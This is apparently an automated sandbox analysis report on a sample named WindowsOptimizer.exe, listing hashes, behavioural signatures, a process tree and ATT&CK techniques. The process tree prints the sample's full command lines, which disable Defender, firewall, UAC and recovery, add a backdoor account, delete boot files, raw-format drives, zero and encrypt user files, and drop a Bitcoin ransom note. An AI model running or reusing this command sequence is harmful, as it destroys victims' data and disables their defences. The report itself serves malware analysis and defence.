Analysis
- max time kernel: 2s
- max time network: 3s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 09-11-2024 21:27

Static task: static1

Behavioral task: behavioral1
  Sample: WindowsOptimizer.exe
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: WindowsOptimizer.exe
  Resource: win10v2004-20241007-en
General
- Target: WindowsOptimizer.exe
- Size: 254KB
- MD5: 5aaa262b518a3417e028e001152c9236
- SHA1: 6d1cda51302d760509822b502a8f980537d17cb0
- SHA256: d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b
- SHA512: 722d7c1a4f87c10f34e6500d1712414f159da8ca9cb02b0b9f44f8df717345cbff473cfe5c486837ad6c9e2487677c7e22c2974f7c36c320a83ffc16812ffbca
- SSDEEP: 3072://w6PYqco8r88P7kHLWwZSO1qPZg6QpakmTjG0efuiWFExDYp1:1PYM8orWwgBeVuNpp1
Malware Config
Signatures
- Processes (reg.exe):
    Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
- Modifies boot configuration data using bcdedit (1 TTP, 5 IoCs)
  Processes (bcdedit.exe): PIDs 2944, 2740, 2652, 2972, 2344
- Disables RegEdit via registry modification (1 IoC)
  Processes (reg.exe):
    Set value (int): \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (reg.exe)
- Disables Task Manager via registry modification
- Modifies Windows Firewall (2 TTPs, 1 IoC)
  Processes (netsh.exe): PID 2748
- Enumerates connected drives (3 TTPs, 3 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes (mountvol.exe, format.com):
    File opened (read-only): \??\X: (mountvol.exe)
    File opened (read-only): \??\D: (format.com)
    File opened (read-only): \??\E: (format.com)
- Indicator Removal: File Deletion (1 TTP)
  Adversaries may delete files left behind by the actions of their intrusion activity.
- Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  Processes (WindowsOptimizer.exe):
    File opened for modification: \??\PhysicalDrive0 (WindowsOptimizer.exe)
- Launches sc.exe (2 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  Processes (sc.exe): PIDs 3004, 2728
- Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  Processes (netsh.exe):
    Key opened: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
    Key queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
    Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 1 IoC)
  Adversaries may check for Internet connectivity on compromised systems.
- Modifies registry key (1 TTP, 3 IoCs)
- Runs net.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (WindowsOptimizer.exe):
    Token: SeShutdownPrivilege, PID 2088 (WindowsOptimizer.exe)
- Suspicious use of FindShellTrayWindow (3 IoCs)
  Processes (efsui.exe): PID 2852 (recorded three times)
- Suspicious use of SendNotifyMessage (3 IoCs)
  Processes (efsui.exe): PID 2852 (recorded three times)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: WindowsOptimizer.exe and cmd.exe (11 instances)
  Each row below (pid process -> target process) is recorded three times in the report unless noted:
    PID 2088 WindowsOptimizer.exe wrote to memory of 1812 cmd.exe
    PID 1812 cmd.exe wrote to memory of 1772 reg.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 2564 cmd.exe
    PID 2564 cmd.exe wrote to memory of 2748 netsh.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 2848 cmd.exe
    PID 2848 cmd.exe wrote to memory of 2808 reg.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 2832 cmd.exe
    PID 2832 cmd.exe wrote to memory of 3004 sc.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 2760 cmd.exe
    PID 2760 cmd.exe wrote to memory of 2728 sc.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 2840 cmd.exe
    PID 2840 cmd.exe wrote to memory of 2736 reg.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 2264 cmd.exe
    PID 2264 cmd.exe wrote to memory of 2876 reg.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 2720 cmd.exe
    PID 2720 cmd.exe wrote to memory of 2764 reg.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 2636 cmd.exe
    PID 2636 cmd.exe wrote to memory of 2856 reg.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 2892 cmd.exe
    PID 2892 cmd.exe wrote to memory of 2944 bcdedit.exe
    PID 2088 WindowsOptimizer.exe wrote to memory of 1576 cmd.exe
    PID 1576 cmd.exe wrote to memory of 2740 bcdedit.exe (recorded once)
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe (PID 2088)
  Command line: "C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  Level 2: C:\Windows\system32\cmd.exe (PID 1812)
    Command line: C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\reg.exe (PID 1772)
      Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  Level 2: C:\Windows\system32\cmd.exe (PID 2564)
    Command line: C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\netsh.exe (PID 2748)
      Command line: netsh advfirewall set allprofiles state off
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
  Level 2: C:\Windows\system32\cmd.exe (PID 2848)
    Command line: C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\reg.exe (PID 2808)
      Command line: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      - UAC bypass
      - Modifies registry key
  Level 2: C:\Windows\system32\cmd.exe (PID 2832)
    Command line: C:\Windows\system32\cmd.exe /c sc stop wuauserv
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\sc.exe (PID 3004)
      Command line: sc stop wuauserv
      - Launches sc.exe
  Level 2: C:\Windows\system32\cmd.exe (PID 2760)
    Command line: C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\sc.exe (PID 2728)
      Command line: sc config wuauserv start=disabled
      - Launches sc.exe
  Level 2: C:\Windows\system32\cmd.exe (PID 2840)
    Command line: C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\reg.exe (PID 2736)
      Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      - Modifies registry key
  Level 2: C:\Windows\system32\cmd.exe (PID 2264)
    Command line: C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\reg.exe (PID 2876)
      Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
      - Disables RegEdit via registry modification
      - Modifies registry key
  Level 2: C:\Windows\system32\cmd.exe (PID 2720)
    Command line: C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\reg.exe (PID 2764)
      Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  Level 2: C:\Windows\system32\cmd.exe (PID 2636)
    Command line: C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\reg.exe (PID 2856)
      Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
  Level 2: C:\Windows\system32\cmd.exe (PID 2892)
    Command line: C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\bcdedit.exe (PID 2944)
      Command line: bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
  Level 2: C:\Windows\system32\cmd.exe (PID 1576)
    Command line: C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\bcdedit.exe (PID 2740)
      Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
  Level 2: C:\Windows\system32\cmd.exe (PID 2716)
    Command line: C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
    Level 3: C:\Windows\system32\net.exe (PID 2632)
      Command line: net user TrojanUser0 ComplexPass123! /add
      Level 4: C:\Windows\system32\net1.exe (PID 2204)
        Command line: C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
  Level 2: C:\Windows\system32\cmd.exe (PID 2656)
    Command line: C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
  Level 2: C:\Windows\system32\cmd.exe (PID 2600)
    Command line: C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
    Level 3: C:\Windows\system32\cipher.exe (PID 1956)
      Command line: cipher /E /A /S:C:\Users\Admin\Desktop
  Level 2: C:\Windows\system32\cmd.exe (PID 2596)
    Command line: C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2680)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AssertNew.cmd"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2472)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\BlockConfirm.mp4"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2196)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CheckpointCopy.vbs"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2884)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteMove.cab"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2232)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteUpdate.mpe"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2220)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertApprove.wvx"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2312)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertToStep.js"
    Level 3: C:\Windows\system32\fsutil.exe (PID 1644)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CopyShow.xlsx"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2888)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DebugShow.ps1"
    Level 3: C:\Windows\system32\fsutil.exe (PID 536)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DisableClose.docx"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2352)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\EnterComplete.asx"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2780)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ExportResume.au"
    Level 3: C:\Windows\system32\fsutil.exe (PID 1912)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportConfirm.doc"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2372)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportExport.pot"
    Level 3: C:\Windows\system32\fsutil.exe (PID 660)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\InstallDisconnect.DVR-MS"
    Level 3: C:\Windows\system32\fsutil.exe (PID 840)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinOut.cfg"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2052)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\LimitAdd.xml"
    Level 3: C:\Windows\system32\fsutil.exe (PID 1508)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeProtect.mov"
    Level 3: C:\Windows\system32\fsutil.exe (PID 352)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PingConvertTo.mp4v"
      - System Network Configuration Discovery: Internet Connection Discovery
    Level 3: C:\Windows\system32\fsutil.exe (PID 908)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopUnregister.potm"
    Level 3: C:\Windows\system32\fsutil.exe (PID 688)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoClose.xlsx"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2584)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RenameSync.docx"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2332)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectInitialize.mov"
    Level 3: C:\Windows\system32\fsutil.exe (PID 1048)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SendRevoke.vsx"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2456)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SetClose.AAC"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2284)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartUninstall.bmp"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2268)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepHide.mpeg"
    Level 3: C:\Windows\system32\fsutil.exe (PID 2248)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopJoin.lock"
    Level 3: C:\Windows\system32\fsutil.exe (PID 3008)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopRedo.vdx"
    Level 3: C:\Windows\system32\fsutil.exe (PID 3012)
      Command line: fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SuspendDebug.asp"
  Level 2: C:\Windows\system32\cmd.exe (PID 2616)
    Command line: C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
  Level 2: C:\Windows\system32\cmd.exe (PID 2668)
    Command line: C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
  Level 2: C:\Windows\system32\cmd.exe (PID 2336)
    Command line: C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
    Level 3: C:\Windows\system32\bcdedit.exe (PID 2652)
      Command line: bcdedit /delete {bootmgr} /f
      - Modifies boot configuration data using bcdedit
  Level 2: C:\Windows\system32\cmd.exe (PID 1620)
    Command line: C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
    Level 3: C:\Windows\system32\bcdedit.exe (PID 2972)
      Command line: bcdedit /delete {default} /f
      - Modifies boot configuration data using bcdedit
  Level 2: C:\Windows\system32\cmd.exe (PID 1744)
    Command line: C:\Windows\system32\cmd.exe /c mountvol X: /s
    Level 3: C:\Windows\system32\mountvol.exe (PID 2224)
      Command line: mountvol X: /s
  Level 2: C:\Windows\system32\cmd.exe (PID 2488)
    Command line: C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
  Level 2: C:\Windows\system32\cmd.exe (PID 2452)
    Command line: C:\Windows\system32\cmd.exe /c mountvol X: /d
    Level 3: C:\Windows\system32\mountvol.exe (PID 1792)
      Command line: mountvol X: /d
      - Enumerates connected drives
  Level 2: C:\Windows\system32\cmd.exe (PID 1788)
    Command line: C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
    Level 3: C:\Windows\system32\format.com (PID 2880)
      Command line: format C: /fs:raw /q /y
  Level 2: C:\Windows\system32\cmd.exe (PID 1712)
    Command line: C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
    Level 3: C:\Windows\system32\format.com (PID 2144)
      Command line: format D: /fs:raw /q /y
      - Enumerates connected drives
  Level 2: C:\Windows\system32\cmd.exe (PID 1280)
    Command line: C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
    Level 3: C:\Windows\system32\format.com (PID 1996)
      Command line: format E: /fs:raw /q /y
      - Enumerates connected drives
  Level 2: C:\Windows\system32\cmd.exe (PID 2896)
    Command line: C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
    Level 3: C:\Windows\system32\bcdedit.exe (PID 2344)
      Command line: bcdedit /delete {current} /f
      - Modifies boot configuration data using bcdedit
  Level 2: C:\Windows\system32\cmd.exe (PID 2176)
    Command line: C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 2016)
    Command line: cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 2252)
    Command line: C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 748)
    Command line: cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 2172)
    Command line: C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 1272)
    Command line: cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 1604)
    Command line: C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 904)
    Command line: cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 2428)
    Command line: C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 2228)
    Command line: cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  Level 2: C:\Windows\system32\cmd.exe (PID 2216)
    Command line: C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
  Level 2: C:\Windows\system32\cmd.exe (PID 560)
    Command line: cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
  Level 2: C:\Windows\system32\cmd.exe (PID 2212)
    Command line: C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
  Level 2: C:\Windows\system32\cmd.exe (PID 2528)
    Command line: cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
  Level 2: C:\Windows\system32\cmd.exe (PID 3028)
    Command line: C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
Level 1: C:\Windows\system32\efsui.exe (PID 2852)
  Command line: efsui.exe /efs /keybackup
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Persistence
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Pre-OS Boot (1)
  - Bootkit (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (3)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (1)
- Indicator Removal (1)
  - File Deletion (1)
- Modify Registry (2)
- Pre-OS Boot (1)
  - Bootkit (1)